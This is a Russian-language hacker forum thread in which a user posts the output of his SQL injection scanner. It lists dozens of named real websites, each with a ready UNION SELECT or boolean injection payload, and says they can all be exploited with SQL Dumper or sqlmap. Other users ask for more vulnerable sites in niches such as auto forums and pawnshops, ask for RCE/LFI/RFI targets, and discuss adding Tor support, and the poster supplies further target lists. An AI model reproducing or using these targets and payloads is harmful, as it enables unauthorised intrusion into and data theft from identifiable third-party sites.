SQLi

Discussion in 'Болталка' started by ky_kask, 31 Oct 2017.

  1. ky_kask

    ky_kask Member

    Joined:
    18 Nov 2009
    Messages:
    74
    Likes Received:
    81
    Reputations:
    6
    Было скучно, сваял утилитку, результаты теста нате (все вскрываются SQL Dumper 8, ну или тем же склмапом. проверил). Мне они как бы нафиг не нужны, смысл был в написании утилиты.

    <code>
    http://shugahaircare.com/product_details.php?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13
    http://jamesbaird.ca/profile_view.php?id=13999999.9' union all select [t],2,3,4 and '0'='0
    http://www.tokaiguitar.de/produktdetail.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8
    http://www.shaggyfoundation.org/gallery.php?id=[t]
    http://www.3tdentalsolutions.com/page.php?id=999999.9 union all select 1,[t],3,4,5
    http://putridflowers.com/music.php?id=999999.9 union all select 1,2,3,4,[t],6,7,8,9,10,11,12,13,14,15,16,17--
    http://www.rohanart.com/gallery.php?ID=999999.9' union all select 1,2,3,[t],5,6,7,8,9,10 and '0'='0
    http://www.coda.cc/product/product.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13
    http://www.teamgear.us/store.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15
    http://www.twitney.co.uk/theme.php?id=[t]
    http://www.htc.ac/info.php?id=3' and [t] and '1'='1
    http://www.htc.uk.com/admin/pdf-news.php?id=[t]
    http://www.smtmax.com/category.php?id=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14
    http://colorytradicion.com/categorias.php?catid=999999.9 union all select [t],2,3
    http://www.wetstage.com/refout.php?id=[t]
    http://nightgallery.ca/event.php?id=[t]
    http://testphp.vulnweb.com/listproducts.php?cat=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t]
    http://sneaindia.com/index.php?id=[t]
    http://www.vacationet.com/resort.php?id=1' and [t] and '1'='1
    http://www.dublinsquarepub.com/news.php?id=999999.9 union all select 1,2,3,[t],5,6
    http://www.nanoentek.com/product.php?id=999999.9' union all select 1,2,[t],4,5,6,7,8,9,10,11,12 and '0'='0
    http://www.peterrosepicture.com/movies.php?id=[t]
    http://www.samedayprint.co.nz/productlist.php?id=pr' and [t] and '1'='1
    http://www.nhlegendsofhockey.com/news.php?id=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10
    http://bransonparksandrecreation.com/park.php?id=999999.9 union all select 1,[t],3,4,5,6,7
    https://www.finvent.com/details.php?id=20 Proxy Highlight' and [t] and '1'='1
    http://www.hexonline.co.uk/Product.php?cid=999999.9 union all select 1,[t],3,4,5,6,7,8
    http://c2-europe.eu/news-full.php?id=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14
    http://derekfell.net/display.php?CatID=999999.9 union all select [t]
    http://www.sendpoints.cn/newsDetail.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12
    http://bellasamui.com/koh-samui-shopping.php?id=999999.9 union all select 1,2,[t],4,5,6
    http://www.saltech.com.pk/prod_detail.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15 and '0'='0
    http://beldico.com/belgium/who/who.php?cat_ID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11--
    http://www.seulugaraqui.com/index.php?id=14' and [t] and '1'='1
    http://www.interplay.com/games/support.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
    http://www.nepalebazaar.com/items.php?id=999999.9 union all select [t],2,3,4
    </code>
     
  2. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,126
    Likes Received:
    25,618
    Reputations:
    147
    Зачем?
     
  3. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,497
    Likes Received:
    16,632
    Reputations:
    373
    От утилитки больше пользы ;)
     
    _________________________
  4. ky_kask

    ky_kask Member

    Joined:
    18 Nov 2009
    Messages:
    74
    Likes Received:
    81
    Reputations:
    6
    Ну дык она на то и создана была. Но пока что это прототип.. ей еще многопоточность надо добавить и поддержку TOR (в жопу прокси, давно от них отказался).. Тогда останется только подцепить к ней процедуру поиска гуглобинга и вперде.
     
    palec2006 likes this.
  5. Sun2017

    Sun2017 Member

    Joined:
    5 May 2017
    Messages:
    337
    Likes Received:
    85
    Reputations:
    0
    хуйня какая то а непрограмма скрипт, кусок говна

    а по факту, пока ты не выложил программу на github или sourceforge под своей фамилией именем и отчеством ты никто и звать тебя никак перед генералами в РФ.
     
  6. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,126
    Likes Received:
    25,618
    Reputations:
    147
    General Фэйлор
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    Давай мне сайты по темам,
    АВто, мото форумы , Фото студии, ломбарды. Услуги фото печати, фото услуги. покраска авто.
    услуги винила, тонировки , также шопы по продаже плёнок. Раз тебе скучно. Будь полезен мне.
    Зоны ru ua kz com org by.
    Так же не только sql можешь. Приветствую rce, lf,i rfi
     
    erwerr2321 likes this.
  8. Sun2017

    Sun2017 Member

    Joined:
    5 May 2017
    Messages:
    337
    Likes Received:
    85
    Reputations:
    0
    автомотофорумы:
    forumodua.com
    forum.bratsk.org
    forumnov.com
    alitrack.ru
    forums.drom.ru
    sakh.com
    forum.auto.ru

    я с 2004 года в интернете, у меня свои темы и шаблоны на wordpress.org (у 15 человек с Москвы они там есть) и на sourceforge свой сервис блогов...

    У меня нет мотивации расти. Нужно создавать новые точки роста, например создать свой VPN сервис.
     
    BabaDook likes this.
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    Больше надо. И не только авто
     
  10. Sun2017

    Sun2017 Member

    Joined:
    5 May 2017
    Messages:
    337
    Likes Received:
    85
    Reputations:
    0
  11. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,497
    Likes Received:
    16,632
    Reputations:
    373
    Так Тоr как socks5 proxy прописывается, разницы никакой между ним и проксей по реализации. Запили поддержку пятого носка и будет тебе торт.
     
    _________________________
    t0ma5 likes this.
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    Мне с уязвимостями нужны. Или я их должен сам искать?
     
  13. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,497
    Likes Received:
    16,632
    Reputations:
    373
    Не напрягай инвалида, ищи сам, ты можншь.
     
    _________________________
  14. ky_kask

    ky_kask Member

    Joined:
    18 Nov 2009
    Messages:
    74
    Likes Received:
    81
    Reputations:
    6


    автомото

    http://parkdrive.kh.ua/cars/?new_cars=1
    http://tuningsport.ru/actions/?sort=date&order=desc
    http://www.crash-cars.ru/docs_ru.php?id=12
    http://uazpatriot.ru/component/poucp?user_id=16853&mode=2
    http://www.gefestauto.ru/catalog/?page=2
    http://parkdrive.kh.ua/printcar.php?id=40
    http://www.smallcar.ru/talk/viewtopic.php?t=6458
     
    BabaDook likes this.
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    Красава, собирай ещё, потом публикуй.
    Половина не валидов, но ничего. вы же старайтесь
     
    #15 BabaDook, 31 Oct 2017
    Last edited: 31 Oct 2017
  16. Sun2017

    Sun2017 Member

    Joined:
    5 May 2017
    Messages:
    337
    Likes Received:
    85
    Reputations:
    0
    инвалид другой человек, я официально здоровый человек по всем документам, который делает присед со штангой 80 кг 5 подходов по 5 раз.

    У вас опять не доработки по определению людей из интернета.
     
  17. ky_kask

    ky_kask Member

    Joined:
    18 Nov 2009
    Messages:
    74
    Likes Received:
    81
    Reputations:
    6
    http://www.coda-continuum.com/product/product.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13
    http://cordoganclark.com/newsitem.php?id=999999.9 union all select 1,2,3,[t],5,6
    http://www.minddesign.co.uk/show.php?id=483999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0
    http://www.sydneyshoot.com/buy.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t]
    http://www.printellectual.com/printers.php?id=9999999.9' union all select 1,2,3,4,[t],6,7,8,9,10,11,12,13,14,15 and '0'='0
    http://www.joangaspar.com/preview.php?id=999999.9' union all select 1,2,3,[t],5,6,7,8,9 and '0'='0
    http://www.rspba.org/html/newsdetail.php?id=999999.9' union all select 1,2,3,4,[t],6,7,8,9,10,11,12,13 and '0'='0
    http://china-artificialgrass.com/productinfo.php?id=99' and [t] and '1'='1
    http://www.theatrotechnis.com/show.php?id=38' and [t] and '1'='1
    http://www.atrium.com.pk/Shopping.php?ID=1' and [t] and '1'='1
    http://parkdrive.kh.ua/printcar.php?id=40' and [t] and '1'='1
    http://uazpatriot.ru/component/poucp?user_id=[t]&mode=2
    http://www.crash-cars.ru/docs_ru.php?id=12 or 1=[t] and 1=1
     
  18. ky_kask

    ky_kask Member

    Joined:
    18 Nov 2009
    Messages:
    74
    Likes Received:
    81
    Reputations:
    6
    Это протип
     
  19. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,497
    Likes Received:
    16,632
    Reputations:
    373
    Дык ты ж на голову инвалид. Это не мешает штангу тягать;)
     
    _________________________
  20. Sun2017

    Sun2017 Member

    Joined:
    5 May 2017
    Messages:
    337
    Likes Received:
    85
    Reputations:
    0
    я не стандартная русская программа зомби,
    у меня есть душа, мечта.